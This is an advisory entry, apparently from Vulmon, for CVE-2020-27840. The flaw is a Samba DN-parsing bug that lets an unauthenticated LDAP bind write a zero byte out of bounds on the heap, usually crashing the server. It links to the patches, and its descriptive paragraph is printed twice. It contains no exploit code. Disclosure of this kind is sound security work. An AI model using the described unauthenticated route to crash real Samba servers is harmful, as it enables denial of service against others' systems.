A security issue has been found in Samba before version 4.14.2. A DN may be represented in string form with arbitrary amounts of space around the component values. These spaces are supposed to be ignored, but invalid DNs strings with spaces may instead cause a zero byte to be written into out-of-bounds memory. An LDAP bind request can send a string DN as a username. This DN is necessarily parsed before the password is checked, so an attacker without real credentials can anonymously trigger this bug. The location of zero byte is a negative offset relative to the location of a dynamically allocated heap buffer; the exact offset depends on the DN string. While it is possible for an attacker to cause non-fatal data corruption, usefully targeting this is likely to be difficult and the most likely outcome is a crash. The affected parsing routine is widely used. LDAP bind is not the only way to trigger the bug remotely, though it appears to be the only unauthenticated method.
A security issue has been found in Samba before version 4.14.2. A DN may be represented in string form with arbitrary amounts of space around the component values. These spaces are supposed to be ignored, but invalid DNs strings with spaces may instead cause a zero byte to be written into out-of-bounds memory. An LDAP bind request can send a string DN as a username. This DN is necessarily parsed before the password is checked, so an attacker without real credentials can anonymously trigger this bug. The location of zero byte is a negative offset relative to the location of a dynamically allocated heap buffer; the exact offset depends on the DN string. While it is possible for an attacker to cause non-fatal data corruption, usefully targeting this is likely to be difficult and the most likely outcome is a crash. The affected parsing routine is widely used. LDAP bind is not the only way to trigger the bug remotely, though it appears to be the only unauthenticated method.
https://www.samba.org/samba/security/CVE-2020-27840.html https://bugzilla.samba.org/show_bug.cgi?id=14595 https://www.samba.org/samba/ftp/patches/security/samba-4.14.0-security-2021-03-24.patch https://git.samba.org/samba.git/?p=samba.git;a=commitdiff;h=c82bea2b723b55dca626fad9f9478d89c90cfd10 https://git.samba.org/samba.git/?p=samba.git;a=commitdiff;h=f89767bea7330ec1936d2312e2b1da7b435c04b7 https://git.samba.org/samba.git/?p=samba.git;a=commitdiff;h=2d82f0e1b84bb390dbf6a3547e4234bfec4eac21
Vulmon